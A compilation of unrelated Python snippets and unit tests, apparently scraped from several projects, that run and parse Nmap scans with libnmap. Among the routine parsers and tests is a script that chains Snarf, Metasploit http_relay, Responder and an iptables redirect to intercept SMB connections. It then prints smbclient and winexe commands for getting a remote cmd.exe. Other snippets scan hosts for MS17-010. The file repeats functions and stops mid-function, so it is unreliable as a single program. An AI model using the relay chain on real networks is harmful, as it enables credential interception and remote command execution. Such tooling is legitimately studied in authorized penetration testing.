def parseNMap(file=None, string=None):
try:
if file: report = NmapParser.parse_fromfile(file)
elif string: report = NmapParser.parse_fromstring(string)
else: raise(Exception)
except:
raise(Exception)
systems = []
for h in report.hosts:
system = {'mac':h.mac, 'ip':h.address, 'status':h.status, 'hostnames': h.hostnames,
'vendor':h.vendor, 'distance':h.distance}
cpeList = []
for c in h.os_match_probabilities():
for x in c.get_cpe():
cpeList.append(x)
cpeList=list(set(cpeList))
if len(cpeList)>0:
system['cpes']=cpeList
services = []
for s in h.services:
service={'port':s.port, 'banner':s.banner, 'protocol':s.protocol, 'name':s.service,
'state':s.state, 'reason':s.reason}
if s.cpelist:
service['cpe'] = s.cpelist[0].cpestring
services.append(service)
system['services']=services
systems.append(system)
scan={"systems":systems, "scan": {"time": report.endtime,
"type": report._nmaprun["args"]}}
return scan
def test_host_address_unchanged(self):
fdir = os.path.dirname(os.path.realpath(__file__))
fd1 = open("%s/%s" % (fdir, 'files/1_hosts_down.xml'), 'r')
fd2 = open("%s/%s" % (fdir, 'files/1_hosts.xml'), 'r')
fd3 = open("%s/%s" % (fdir, 'files/1_hosts.xml'), 'r')
nr1 = NmapParser.parse(fd1.read())
nr2 = NmapParser.parse(fd2.read())
nr3 = NmapParser.parse(fd3.read())
h1 = nr1.hosts.pop()
h2 = nr2.hosts.pop()
h3 = nr3.hosts.pop()
self.assertRaises(NmapDiffException, h1.diff, h2)
self.assertEqual(h2.diff(h3).changed(), set([]))
self.assertEqual(h2.diff(h3).added(), set([]))
self.assertEqual(h2.diff(h3).removed(), set([]))
self.assertEqual(h2.diff(h3).unchanged(),
set(['status',
"NmapService::tcp.22",
"NmapService::tcp.111",
"NmapService::tcp.631",
'hostnames',
"NmapService::tcp.3306",
'address',
"NmapService::tcp.25"]))
def parseNMap(file=None, string=None):
try:
if file: report = NmapParser.parse_fromfile(file)
if string: report = NmapParser.parse_fromstring(string)
except:
exit("Invalid Nmap xml!")
systems = []
for h in report.hosts:
system = {'mac':h.mac, 'ip':h.address, 'status':h.status, 'hostnames': h.hostnames,
'vendor':h.vendor, 'distance':h.distance}
cpeList = []
for c in h.os_match_probabilities():
for x in c.get_cpe():
cpeList.append(x)
cpeList=list(set(cpeList))
if len(cpeList)>0:
system['osDetect']=cpeList
services = []
for s in h.services:
service={'port':s.port, 'banner':s.banner, 'protocol':s.protocol, 'name':s.service,
'state':s.state, 'reason':s.reason}
if s.cpelist:
service['cpe'] = s.cpelist[0].cpestring
services.append(service)
system['services']=services
systems.append(system)
return systems
def test_port_state_unchanged(self):
nservice1 = NmapParser.parse(port_string)
nservice2 = NmapParser.parse(port_string_other2)
#nservice3 = NmapParser.parse(port_string_other3)
#nservice4 = NmapParser.parse(port_string_other4)
self.assertEqual(nservice1.diff(nservice2).unchanged(),
set(['banner', 'protocol', 'port', 'service', 'id', 'reason']))
def main(args):
# Initial var setup
if os.geteuid():
sys.exit('['+R+'-'+W+'] Please run as root')
home_dir = args.home_dir
iface = args.interface
ip = ifaddresses(iface)[AF_INET][0]['addr']
report = NmapParser.parse_fromfile(args.nmapxml)
# Get Snarf
github_url = 'https://github.com/purpleteam/snarf'
get_git_project(github_url, home_dir)
# Get Nodejs
get_nodejs()
# Start MSF http_relay
msf_pid = start_msf_http_relay(ip, home_dir)
# Get SMB hosts
report = NmapParser.parse_fromfile(args.nmapxml)
get_smb_hosts(report, home_dir)
# Run Snarf
cmd = 'screen -S snarf -dm nodejs {}snarf/snarf.js -f {}smb_hosts.txt {}'.format(home_dir, home_dir, ip)
out, err, snarf_pid = run_cmd(cmd)
# Run Snarf iptables cmd
time.sleep(5) # Give snarf time to startup
cmd = 'iptables -t nat -A PREROUTING -p tcp --dport 445 -j SNARF'
out, err, iptables_pid = run_cmd(cmd)
# Start Responder
resp_pid = start_responder(iface, home_dir)
# Check that everything ran as it should
# Need pid+1 because screen -Sdm causes a fork and execcve
# forcing the real screen process to become pid+1
pids = [(resp_pid+1, 'Responder'),
(msf_pid+1, 'Metasploit http_relay'),
(snarf_pid+1, 'Snarf')]
confirm(pids)
print '\n[+] Done! Point your browser to http://localhost:4001 and refresh it every few minutes to see MITM\'d SMB connections'
print ' After a connection has expired or you manually expire and choose it it run:'
print ' smbclient -U a%a //127.0.0.1/C$'
print ' If the initiator of the SMB connection has admin rights try:'
print ' winexe -U a%a //127.0.0.1/ cmd.exe'
print '\n[*] Ctrl-C to cleanup'
try:
while 1:
time.sleep(10)
except KeyboardInterrupt:
cleanup(pids, home_dir)
sys.exit()
def test_host_address_changed(self):
fdir = os.path.dirname(os.path.realpath(__file__))
fd1 = open("%s/%s" % (fdir, 'files/1_hosts_down.xml'), 'r')
fd2 = open("%s/%s" % (fdir, 'files/1_hosts.xml'), 'r')
nr1 = NmapParser.parse(fd1.read())
nr2 = NmapParser.parse(fd2.read())
h1 = nr1.hosts[0]
h2 = nr2.hosts[0]
self.assertRaises(NmapDiffException, h1.diff, h2)
def test_extra_ports(self):
h1 = NmapParser.parse(host1)
h2 = NmapParser.parse(host2)
self.assertEqual(h1.extraports_state['state'], {'count': '995', 'state': 'WILLY_WONCKA'})
self.assertEqual(h1.extraports_reasons, [{'reason': 'conn-refused', 'count': '995'}])
self.assertEqual(h2.extraports_state['state'], {'count': '995', 'state': 'closed'})
self.assertEqual(h2.extraports_reasons, [{'reason': 'conn-refused', 'count': '995'}])
def test_eq_host(self):
h1 = NmapParser.parse(host1)
h2 = NmapParser.parse(host2)
h3 = NmapParser.parse(host3)
h4 = NmapParser.parse(host4)
self.assertNotEqual(h1, h2)
self.assertEqual(h1, h1)
self.assertNotEqual(h1, h3)
self.assertEqual(h1, h4)
self.assertNotEqual(h2, h3)
def test_report_constructor(self):
for testfile in self.flist:
fd = open(testfile['file'], 'r')
s = fd.read()
fd.close()
nr = NmapParser.parse(s)
nr2 = NmapParser.parse(s)
self.assertEqual(len(nr.hosts), testfile['hosts'])
self.assertEqual(len(nr2.hosts), testfile['hosts'])
self.assertEqual(sorted(nr2.get_raw_data()),
sorted(nr.get_raw_data()))
def test_host_api(self):
h = NmapParser.parse(host2)
self.assertEqual(h.starttime, "1361738318")
self.assertEqual(h.endtime, "13617386177")
self.assertEqual(h.address, '127.0.0.1')
self.assertEqual(h.status, "up")
self.assertEqual(h.hostnames, ['localhost', 'localhost', 'localhost2'])
h2 = NmapParser.parse(host3)
self.assertEqual(len(h2.services), 5)
self.assertEqual(len(h2.get_ports()), 5)
self.assertEqual(len(h2.get_open_ports()), 3)
self.assertEqual(h2.get_service(22, "tcp").state, "open")
def test_port_state_changed(self):
nservice1 = NmapParser.parse(port_string)
nservice2 = NmapParser.parse(port_string_other2)
nservice3 = NmapParser.parse(port_string_other3)
nservice4 = NmapParser.parse(port_string_other4)
self.assertEqual(nservice1.diff(nservice2).changed(), set(['state']))
self.assertRaises(NmapDiffException, nservice1.diff, nservice3)
self.assertRaises(NmapDiffException, nservice1.diff, nservice4)
#
self.assertRaises(NmapDiffException, nservice2.diff, nservice3)
self.assertEqual(nservice3.diff(nservice4).changed(),
set(['state', 'service']))
def test_service_not_equal(self):
for testfile in self.flist:
fd = open(testfile['file'], 'r')
np1 = NmapParser.parse(fd.read())
fd.close()
fd = open(testfile['file'], 'r')
np2 = NmapParser.parse(fd.read())
fd.close()
host1 = np1.hosts.pop()
host2 = np2.hosts.pop()
for i in range(len(host1.services)):
host1.services[i]._state['state'] = 'changed'
self.assertNotEqual(host1.services[i], host2.services[i])
def test_host_not_equal(self):
for testfile in self.flist:
fd = open(testfile['file'], 'r')
np1 = NmapParser.parse(fd.read())
fd.close()
fd = open(testfile['file'], 'r')
np2 = NmapParser.parse(fd.read())
fd.close()
host1 = np1.hosts.pop()
host2 = np2.hosts.pop()
host1._address['addr'] = 'xxxxxx'
self.assertNotEqual(host1, host2)
def test_host_not_equal(self):
for testfile in self.flist:
fd = open(testfile['file'], 'r')
np1 = NmapParser.parse(fd.read())
fd.close()
fd = open(testfile['file'], 'r')
np2 = NmapParser.parse(fd.read())
fd.close()
host1 = np1.hosts.pop()
host2 = np2.hosts.pop()
host1.address = {'addr': '1.3.3.7', 'addrtype': 'ipv4'}
self.assertNotEqual(host1, host2)
def test_host_equal(self):
for testfile in self.flist:
fd = open(testfile['file'], 'r')
np1 = NmapParser.parse(fd.read())
fd.close()
fd = open(testfile['file'], 'r')
np2 = NmapParser.parse(fd.read())
fd.close()
host1 = np1.hosts.pop()
host2 = np2.hosts.pop()
host1.services[0]._portid = '23'
self.assertEqual(host1, host2)
def knockd_test(ip,outfile,start_key,stop_key):
## Baseline Nmap Scan
print "\n[-] Scanning " + ip + " with Nmap, this could take a minute...go get some coffee"
nm = NmapProcess(ip, options="-p 0-65535")
rc = nm.run()
if nm.rc == 0:
before = NmapParser.parse(nm.stdout)
before_ports = before.hosts[0].get_ports()
else:
print nm.stderr
sys.exit()
## Sending Default Knockd Port Knock Sequence with Scapy
print "\n[-] Sending default knockd sequence to " + ip
for x in start_key:
send(IP(dst=ip)/TCP(dport=x),verbose=0)
## Subsequent Nmap Scan
print "\n[-] Scanning again...too soon for more coffee???"
rc = nm.run()
if nm.rc == 0:
after = NmapParser.parse(nm.stdout)
after_ports = after.hosts[0].get_ports()
else:
print nm.stderr
sys.exit()
## Compare Scans to Determine if any Services were Activated
diff = set(after_ports)-set(before_ports)
new_ports = list(diff)
if len(new_ports) > 0:
print "\n[+] " + str(len(new_ports)) + " new port(s) opened..."
for x in new_ports:
print x
print "\nWriting to output file - " + outfile
f = open(outfile,'a')
f.write("Ports opened on " + ip + " - " + str(new_ports) + "\n")
f.close()
## Stopping Activated Services with Default Close Sequence
print "\n[-] Disabling opened service on " + ip + " by sending default close sequence..."
print " *** If you want to manually interact with the service, use the knockd_on-off.py script ***\n"
for x in stop_key:
send(IP(dst=ip)/TCP(dport=x),verbose=0)
elif len(new_ports) == 0:
print "\n[-] No new services opened...\n"
else:
print "\n[-] An error has occurred"
sys.exit()
def __init__(self, old_report=None, new_report=None):
self.changed = []
self.added = []
self.removed = []
print old_report
if old_report and new_report:
print "using given old and new_report"
#pass
else:
print "no valid data.. taking dummy files from disk"
old_report = NmapParser.parse_fromfile('nmapui/test/1_hosts.xml')
new_report = NmapParser.parse_fromfile('nmapui/test/1_hosts_diff.xml')
self.do_diff(new_report, old_report)
self.print_diff()
def get_report(xmlscan):
if not path.exists(xmlscan):
logging.error('No file found!')
return None
# Try to parse TODO: do it in proper way
try:
return NmapParser.parse_fromfile(xmlscan)
except:
logging.warning('Exception during nmap file parsing. Trying to parse it as incomplete...')
try:
return NmapParser.parse_fromfile(xmlscan, incomplete=True)
except:
logging.error('Exception during parsing nmap file as incomplete. Exiting...')
return None
def start(self):
''' Start Discovery '''
logs = core.logs.Logger(config=self.config, proc_name="discovery.nmap")
logger = logs.getLogger()
logger = logs.clean_handlers(logger)
logger.info("Starting scan of environment")
try:
nmap = NmapProcess(self.config['discovery']['plugins']['nmap']['target'],
options=self.config['discovery']['plugins']['nmap']['flags'])
except Exception as e:
raise Exception("Failed to execute nmap process: {0}".format(e.message))
up = []
while True:
nmap.run()
nmap_report = NmapParser.parse(nmap.stdout)
for scanned_host in nmap_report.hosts:
if "up" in scanned_host.status and scanned_host.address not in up:
up.append(scanned_host.address)
logger.debug("Found new host: {0}".format(scanned_host.address))
if self.dbc.new_discovery(ip=scanned_host.address):
logger.debug("Added host {0} to discovery queue".format(
scanned_host.address))
else:
logger.debug("Failed to add host {0} to discovery queue".format(
scanned_host.address))
logger.debug("Scanned {0} hosts, {1} found up".format(
len(nmap_report.hosts), len(up)))
time.sleep(self.config['discovery']['plugins']['nmap']['interval'])
return True
def nmap_scan(hosts):
'''
Do Nmap scan
'''
# -sV is included by default in NmapProcess nmap cmd
# To add more: options = '-T4 -sU -p-'
# hosts = ['192.168.0.1', '192.168.0.2']
#nmap_args = '-T4 -sV -sS -pU:161,137,139'# -sS -sU --top-ports'
nmap_args = '-T4 -sS -sV --max-rtt-timeout 150ms --max-retries 3'
print '[*] Running: nmap {0} -iL <hostlist>'.format(nmap_args)
nmap_proc = NmapProcess(targets=hosts, options=nmap_args)
#rc = nmap_proc.sudo_run()
rc = nmap_proc.sudo_run_background()
while nmap_proc.is_running():
print("[*] Nmap progress: {1}%".format(nmap_proc.etc, nmap_proc.progress))
time.sleep(2)
xml = nmap_proc.stdout
try:
report = NmapParser.parse(nmap_proc.stdout)
except NmapParserException as e:
print 'Exception raised while parsing scan: {0}'.format(e.msg)
sys.exit()
return report
def do_scan(target,options):
command = ["/usr/bin/nmap", "-oX", "-"] + options + [str(target)]
print("Executing nmap Command")
print(command)
output = subprocess.check_output(command)
print output
return NmapParser.parse(output)
def from_nmap_xml(self, scan_dir=SCAN_DIR): try: while True: while len(glob.glob(scan_dir + "/*.xml")) == 0: print "Waiting for nmap scan files..." time.sleep(30) print "[]-->Processing " + str(len(glob.glob(scan_dir + "/*.xml"))) + " new scans." for scan_file in glob.glob(scan_dir + "/*.xml"): print "[]-->Importing " + scan_file scan_obj = NmapParser.parse_fromfile(scan_file) for host in scan_obj.hosts: self._scan_count += 1 # doc_id is the _index in elasticsearch. it's immutable for the host. doc_id = str(int(IPAddress(host.ipv4))) print " Importing banner : " + str(doc_id) new_entry_model = self._conn.factory_object(self._index, self._documment_type, bm.host) self._create_banner_object(new_entry_model, host) # Cleanup processed scans by moving to the 'archive' subdirectory. if not self._debug_mode: shutil.move(scan_file, scan_dir + "/archive") if self._bulk_mode: bulk_result = self._conn.force_bulk() print "[]-->Flushed : " + str(bulk_result) + " from the bulk." print "[]-->Processed : " + str(self._scan_count) + " scans, and " + str(self._banner_count) + " banners successfully." print "[]-->DONE" except KeyboardInterrupt: self._dispose()
def _process(self, session):
nmproc = NmapProcess("10.0.0.1", "-sT")
parsed = None
rc = nmproc.run()
if rc != 0:
logging.critical("NMAP Scan failed: {0}".format(nmproc.stderr))
try:
parsed = NmapParser.parse(nmproc.stdout)
except NmapParserException as e:
logging.critical("NMAP Parse failed: {0}".format(e.msg))
if parsed is not None:
for host in parsed.hosts:
if len(host.hostnames):
tmp_host = host.hostnames.pop()
else:
tmp_host = host.address
print("Nmap scan report for {0} ({1})".format(tmp_host, host.address))
print("Host is {0}.".format(host.status))
print(" PORT STATE SERVICE")
for serv in host.services:
pserv = "{0:>5s}/{1:3s} {2:12s} {3}".format(
str(serv.port), serv.protocol, serv.state, serv.service
)
if len(serv.banner):
pserv += " ({0})".format(serv.banner)
print(pserv)
def nmap_multi_port_syn_ping(self, portlist=(21, 22, 23, 25, 53, 80, 110, 111, 135, 137, 138, 139, 143, 443, 8080)):
nmap_xml_file = self.nmap_xml_file_location + '/' + self.nmap_xml_file_name.format("nmap_multi_port_syn_ping",
self.ip_address.replace(".",
"_"))
if not isinstance(portlist, (tuple, list)):
raise TypeError(u"Portlist must be either a list or tuple integers/port numbers.")
if not all(isinstance(p, int) for p in portlist):
raise TypeError(u"Port numbers must be an integer!")
ports = ','.join(str(p) for p in portlist)
proc = Popen([self.nmap_binary, '-oX', nmap_xml_file, '-sP', '-PS' + ports, self.ip_address],
stdout=PIPE,
stderr=PIPE)
stdout, stderr = proc.communicate()
error = stderr.strip('\n') if stderr else stdout.strip('\n')
if not proc.returncode == 0:
raise OSError(u"Ran into issue running nmap multi port syn scan: {0}".format(error))
if proc.returncode == 0:
nmap_report = NmapParser.parse_fromfile(nmap_xml_file)
remove(nmap_xml_file)
if nmap_report.hosts_up >= 1:
return 0
else:
return 1
else:
return 1
def _parse_results(self, stdout):
""" Parses results from an nmap scan.
Returns True if successful, False otherwise. """
try:
results = NmapParser.parse(stdout)
now = dt_util.now()
self.last_results = []
for host in results.hosts:
if host.is_up():
if host.hostnames:
name = host.hostnames[0]
else:
name = host.ipv4
if host.mac:
mac = host.mac
else:
mac = _arp(host.ipv4)
if mac:
device = Device(mac.upper(), name, host.ipv4, now)
self.last_results.append(device)
_LOGGER.info("nmap scan successful")
return True
except NmapParserException as parse_exc:
_LOGGER.error("failed to parse nmap results: %s", parse_exc.msg)
self.last_results = []
return False
def parse_nmap_report(self,nmap_stdout):
"""parse start flag"""
if(self._flg_is_storing != True):
self._flg_is_storing = True
if(self._flg_store_finished != False):
self._flg_store_finished = False
try:
nmap_report = NmapParser.parse(nmap_stdout)
self._flg_is_storing = True
for host in nmap_report.hosts:
if len(host.hostnames):
tmp_host = host.hostnames.pop()
else:
tmp_host = host.address
for serv in host.services:
# if serv.state in self.port_states:
self.scan_report[str(serv.port)+serv.protocol] = serv.service
"""parse finished flag"""
if(self._flg_is_storing != False):
self._flg_is_storing = False
if(self._flg_is_storing != True):
self._flg_is_storing = True
print self.scan_report.items()
return _flg_store_finished
except Exception, e:
return e
def parse_nmap_report(nmap_stdout, taskid=None):
try:
# 处理结果并写入后台数据库
nmap_report = NmapParser.parse(nmap_stdout)
# 声明后台对应的ORM数据库处理模型
my_services_backend = BackendPluginFactory.create(plugin_name='backend_service', url=global_dbcoon, echo=False, encoding='utf-8', pool_timeout=3600)
my_hosts_backend = BackendPluginFactory.create(plugin_name='backend_host', url=global_dbcoon, echo=False, encoding='utf-8', pool_timeout=3600)
# 开始处理扫描结果
for host in nmap_report.hosts:
# print("Nmap scan : {0}".format(host.address))
host.taskid = taskid
# 处理主机开放的服务和端口
for serv in host.services:
serv.address = host.address
serv.taskid = taskid
serv.endtime = host.endtime
if serv.state in global_log_states:
serv.save(my_services_backend)
host.save(my_hosts_backend)
return '* Scan finished'
except Exception, e:
# 处理报表出错,返回错误结果
return e
def get_report_from_async_result(cls, task_id):
"""This classmethod gets a NmapReport object by the task_id.
The NmapReport is constructed on demand from the AsyncResult object. This can
only produce a valid result if the Celery Task is finished already.
Args:
cls (cls): The class itself (not an instance)
task_id (str): task_id
Note:
This currently is a Sub-Class of NmapReport. Maybe this can be done more
transparently (what's with super?). TODO
Returns:
NmapReport object
"""
try:
_resultdict = celery_pipe.AsyncResult(task_id).result
_resultxml = _resultdict['report']
_report = NmapParser.parse_fromstring(_resultxml)
return _report
except NmapParserException as e:
print e
return None
def nmap_os_services_scan(self, target, portlist=None, version_intense = 0):
'''
Runs
Arguments:
- ``target``: IP or the range of IPs that need to be tested
- ``portlist``: list of ports, range of ports that need to be tested. They can either be comma separated or separated by hyphen
example: 121,161,240 or 1-100
- ``version_intense``: Version intensity of OS detection
Examples:
| nmap os services scan | target | portlist | version_intense |
'''
target = str(target)
if portlist:
nmap_proc_cmd = "-Pn -sV --version-intensity {0} -p {1}".format(portlist, version_intense)
else:
nmap_proc_cmd = "-Pn -sV --version-intensity {0}".format(portlist)
nmproc = NmapProcess(target, nmap_proc_cmd)
rc = nmproc.run()
if rc != 0:
raise Exception('EXCEPTION: nmap scan failed: {0}'.format(nmproc.stderr))
try:
parsed = NmapParser.parse(nmproc.stdout)
print parsed
self.results = parsed
except NmapParserException as ne:
print 'EXCEPTION: Exception in parsing results: {0}'.format(ne.msg)
def nmap_script_scan(self, target, portlist=None, version_intense="0", script_name=None):
'''
Runs nmap with the -sC arg or the --script arg if script_name is provided. Options used are: -sV --version-intensity <default:0> -sC|--script=<script_name>
Arguments:
- ``target``: IP or the range of IPs that need to be tested
- ``portlist``: list of ports, range of ports that need to be tested. They can either be comma separated or separated by hyphen
example: 121,161,240 or 1-100
- ``version_intense``: Version intensity of OS detection
- ``script_name``: Script Name that needs to be referenced
Examples:
| nmap script scan | target | portlist | version_intense | script_name |
'''
target = str(target)
if portlist and script_name:
nmap_proc_cmd = "-Pn -sV --version-intensity {0} --script={1} -p {2}".format(version_intense, script_name, portlist)
elif portlist and not script_name:
nmap_proc_cmd = "-Pn -sV --version-intensity {0} -sC -p {1}".format(version_intense, portlist)
elif script_name and not portlist:
raise Exception('EXCEPTION: If you use specific script, you have to specify a port')
else:
nmap_proc_cmd = "-Pn -sV --version-intensity {0} -sC".format(version_intense)
nmproc = NmapProcess(target, nmap_proc_cmd)
rc = nmproc.run()
if rc != 0:
raise Exception('EXCEPTION: nmap scan failed: {0}'.format(nmproc.stderr))
try:
parsed = NmapParser.parse(nmproc.stdout)
print parsed
self.results = parsed
except NmapParserException as ne:
print 'EXCEPTION: Exception in parsing results: {0}'.format(ne.msg)
def do_scan(targets, options):
nm = NmapProcess(targets, options)
rc = nm.run()
if rc != 0:
print("nmap scan failed: {0}".format(nm.stderr))
try:
parsed = NmapParser.parse(nm.stdout)
except NmapParserException as e:
print("Exception raised while parsing scan: {0}".format(e.msg))
return parsed
def execute_scan(self, target, args):
services = []
nm = NmapProcess(target, options="-sV -sS -p 443")
nm.run()
parsed = NmapParser.parse(nm.stdout)
host = parsed.hosts[0]
for serv in host.services:
services.append(serv.get_dict())
engine = TaskEngine(args)
engine.process_scan(target, services)
engine.run_tasks()
def get_hosts_from_scan(self, target, options=''):
nmap_proc = NmapProcess(targets=target, options=options)
nmap_proc.run()
nmap_report_obj = NmapParser.parse(nmap_proc.stdout)
hosts = {}
for host in nmap_report_obj.hosts:
hosts[host.address] = host.status
return hosts
def getall(self, dict_filter=None):
"""return a list of tuple (id,NmapReport) saved in the backend
TODO : add a filter capability
"""
nmapreportlist = []
resultset = self.collection.find()
for report in resultset:
oid = report['_id']
del report['_id']
nmapreport = NmapParser.parse_fromdict(report)
nmapreportlist.append((oid, nmapreport))
return nmapreportlist
def nmap_parser(nmap_xml):
"""
If user chooses to start from nmap.xml, read the xml and return an nmap_report object
:param nmap_xml:
:return:
"""
try:
nmap_report = NmapParser.parse_fromfile(nmap_xml)
return nmap_report
except:
print("\n[!] Error reading {0}. Does it exist?\n".format(nmap_xml))
exit()
def get_report(cls, task_id):
_report = None
if isinstance(task_id, str) or isinstance(task_id, unicode):
try:
_resultdict = celery_pipe.AsyncResult(task_id).result
print "report"
print(task_id)
_resultxml = _resultdict['report']
_report = NmapParser.parse_fromstring(_resultxml)
except NmapParserException:
pass
return _report
def parseFiles(fileList):
nmapList = []
for f in fileList:
try:
print "[+] Parsing", f
nmapObject = NmapParser.parse_fromfile(f)
nmapList.append(nmapObject)
except NmapParserException, e:
print "[!] Nmap Parsing Exception:", e, f
# Do something clever? no, just ignore it
except Exception, e:
print "[!] Generic Exception:", e
def parseNmapOutput(nmapOutput, hosts):
result = []
nmapLiveHosts = []
report = NmapParser.parse_fromfile(nmapOutput)
for host in report.hosts:
hostRow = {
"domain": "",
"port": "",
"banner": None,
"http-devframework": None,
"X-Powered-By": None,
"http-server-header": None
}
ip = host.address
if len(host.hostnames) != 0:
hostname = host.hostnames[0]
hostRow["domain"] = hostname
if host.is_up():
for p in host.get_open_ports():
if p[0] == 80:
url = "http://" + hostname
else:
url = "https://" + hostname
nmapLiveHosts.append(url)
for s in host.services:
if (s.open()):
serviceName = ""
hostRow["port"] = s.port
if (len(s.scripts_results) > 0):
for script in s.scripts_results:
if ("id" not in script.keys()
or "output" not in script.keys()):
break
if (script["id"] == "http-devframework"
and "detected" in script["output"]):
hostRow[script["id"]] = script["output"]
elif script["id"] == "http-server-header":
hostRow[script["id"]] = script["output"]
elif script["id"] == "http-headers":
header = re.search('X-Powered-By:.*',
script["output"],
re.IGNORECASE)
if (header):
hostRow["X-Powered-By"] = header.group(
0)
if (s.banner):
hostRow["banner"] = s.banner
result.append(hostRow)
updateListsWithNmapResults(nmapLiveHosts, nmapOutput)
return result
def main():
''' get the args '''
args = command_args()
''' Load the nmap XML file '''
nmapxml = NmapParser.parse_fromfile(args.filename)
#output = args.output
''' do the parsing stuff here '''
results = get_results(nmapxml)
print_basic(nmapxml, results, args.output, args.verbose)
if args.xlsx: # if -x is being used, then this shows
print_xlsx(results, args.xlsx)
def test_extra_ports(self):
h1 = NmapParser.parse(host1)
h2 = NmapParser.parse(host2)
self.assertEqual(h1.extraports_state['state'], {
'count': '995',
'state': 'WILLY_WONCKA'
})
self.assertEqual(h1.extraports_reasons, [{
'reason': 'conn-refused',
'count': '995'
}])
self.assertEqual(h2.extraports_state['state'], {
'count': '995',
'state': 'closed'
})
self.assertEqual(h2.extraports_reasons, [{
'reason': 'conn-refused',
'count': '995'
}])
def do_scan(targets, options, fqp=None):
nm = NmapProcess(targets, options, fqp=fqp)
rc = nm.run()
if rc != 0:
print "nmap scan failed: %s" % (nm.stderr)
try:
parsed = NmapParser.parse(nm.stdout)
except NmapParserException as e:
print "Exception raised while parsing scan: %s" % (e.msg)
return parsed
def startParse(self):
#nmap xml parse func
try:
self.startNmapScan = self.startNmap()
if self.startNmap is not False:
self.parse = NmapParser.parse(self.startNmapScan)
self.nmapScanreport = self.startReport()
else:
sys.exit(0)
except NmapParserException as e:
logging.info(e)
sys.exit(0)
def mongo_test_insert(self):
""""best way to insert is to call save() of nmapreport"""
for testfile in self.flist:
fd = open(testfile['file'], 'r')
s = fd.read()
fd.close()
nr = NmapParser.parse(s)
#create the backend factory object
factory = BackendPluginFactory()
mongodb = factory.create(plugin_name="mongodb")
self.assertNotEqual(nr.save(mongodb), None)
def do_scan(targets, options):
parsed = None
nmproc = NmapProcess(targets, options)
rc = nmproc.run()
message = ""
if rc != 0:
message = "Tarama yapılırken bir hata oluştu: {0}".format(nmproc.stderr)
try:
parsed = NmapParser.parse(nmproc.stdout)
except NmapParserException as e:
message = "Tarama sonucu parse edilirken bir hata oluştu: {0}".format(e.msg)
return {"message": message, "parsed": parsed}
def nmap_smb_vulnscan():
"""
Scans available smb services in the database for smb signing and ms17-010.
"""
service_search = ServiceSearch()
services = service_search.get_services(ports=['445'], tags=['!smb_vulnscan'], up=True)
services = [service for service in services]
service_dict = {}
for service in services:
service.add_tag('smb_vulnscan')
service_dict[str(service.address)] = service
nmap_args = "-Pn -n --disable-arp-ping --script smb-security-mode.nse,smb-vuln-ms17-010.nse -p 445".split(" ")
if services:
result = nmap(nmap_args, [str(s.address) for s in services])
parser = NmapParser()
report = parser.parse_fromstring(result)
smb_signing = 0
ms17 = 0
for nmap_host in report.hosts:
for script_result in nmap_host.scripts_results:
script_result = script_result.get('elements', {})
service = service_dict[str(nmap_host.address)]
if script_result.get('message_signing', '') == 'disabled':
print_success("({}) SMB Signing disabled".format(nmap_host.address))
service.add_tag('smb_signing_disabled')
smb_signing += 1
if script_result.get('CVE-2017-0143', {}).get('state', '') == 'VULNERABLE':
print_success("({}) Vulnerable for MS17-010".format(nmap_host.address))
service.add_tag('MS17-010')
ms17 += 1
service.update(tags=service.tags)
print_notification("Completed, 'smb_signing_disabled' tag added to systems with smb signing disabled, 'MS17-010' tag added to systems that did not apply MS17-010.")
stats = {'smb_signing': smb_signing, 'MS17_010': ms17, 'scanned_services': len(services)}
Logger().log('smb_vulnscan', 'Scanned {} smb services for vulnerabilities'.format(len(services)), stats)
else:
print_notification("No services found to scan.")
def openUdpPorts(self):
"""The openUdpPorts function will parse all found ports from the UDP nmap xml file fed to
the report variable. All ports will be appended to the lists in __init__ and will
then be accessible from the NmapParserFunk Class."""
def parsefile(xmlfile):
parser = make_parser()
parser.setContentHandler(ContentHandler())
parser.parse(xmlfile)
c = config_parser.CommandParser(f"{os.getcwd()}/config/config.yaml",
self.target)
if os.path.exists(c.getPath("nmap", "nmap_top_udp_ports_xml")):
try:
parsefile(c.getPath("nmap", "nmap_top_udp_ports_xml"))
report = NmapParser.parse_fromfile(
c.getPath("nmap", "nmap_top_udp_ports_xml"))
self.udp_nmap_services += report.hosts[0].services
self.udp_nmap_services = sorted(self.udp_nmap_services,
key=lambda s: s.port)
for service in self.udp_nmap_services:
if "open" not in service.state:
continue
if "open|filtered" in service.state:
continue
self.udp_services.append((
service.port,
service.service,
service.tunnel,
service.cpelist,
service.banner,
))
for service in self.udp_services:
if service[0] not in self.udp_ports:
self.udp_ports.append(service[0])
if "snmp" in service[1]:
if service[0] not in self.snmp_ports:
self.snmp_ports.append(service[0])
if "sip" in service[1]:
if service[0] not in self.sip_udp_ports:
self.sip_udp_ports.append(service[0])
if "isakmp?" in service[1] or ("isakmp" in service[1]):
if service[0] not in self.ike_ports:
self.ike_ports.append(service[0])
# print("SNMP PORTS", self.snmp_ports)
# print("UDP SERVICES", self.udp_services)
# print("UDP OPEN PORTS", self.udp_ports)
except Exception as e:
print(
f"""{c.getPath("nmap", "nmap_top_udp_ports_xml")} Cannot Parse UDP nmap xml file. {e}"""
)
return
def test_diff_host(self):
h1 = NmapParser.parse(host1)
h2 = NmapParser.parse(host2)
h3 = NmapParser.parse(host3)
c1 = h1.diff(h2)
c2 = h1.diff(h3)
c3 = h2.diff(h3)
self.assertEqual(c1.changed(), set(['hostnames']))
self.assertEqual(c1.added(), set([]))
self.assertEqual(c1.removed(), set([]))
self.assertEqual(c1.unchanged(), set(['status',
"NmapService::tcp.22",
"NmapService::tcp.111",
"NmapService::tcp.631",
"NmapService::tcp.3306",
'address',
"NmapService::tcp.25"]))
self.assertEqual(c2.changed(), set(['status',
"NmapService::tcp.3306"]))
self.assertEqual(c2.added(), set(["NmapService::tcp.25"]))
self.assertEqual(c2.removed(), set(["NmapService::tcp.3307"]))
self.assertEqual(c2.unchanged(), set(["NmapService::tcp.631",
'hostnames',
"NmapService::tcp.22",
"NmapService::tcp.111",
'address']))
self.assertEqual(c3.changed(), set(['status', 'hostnames',
"NmapService::tcp.3306"]))
self.assertEqual(c3.added(), set(["NmapService::tcp.25"]))
self.assertEqual(c3.removed(), set(["NmapService::tcp.3307"]))
self.assertEqual(c3.unchanged(), set(["NmapService::tcp.631",
"NmapService::tcp.22",
"NmapService::tcp.111",
'address']))
def nmap_follow_up_scan(hosts, port):
"""
This needs to be reworked. If nmap service scan can't determine the service, i run an nmap scan without service
detection to get the default port. I should just read the IANA ports file instead and grep for the port, or maybe
even the nmap version of the IANA ports list.
:param hosts:
:param port:
:return:
"""
nm = NmapProcess(hosts, options="-Pn -p %d" % port)
rc = nm.run()
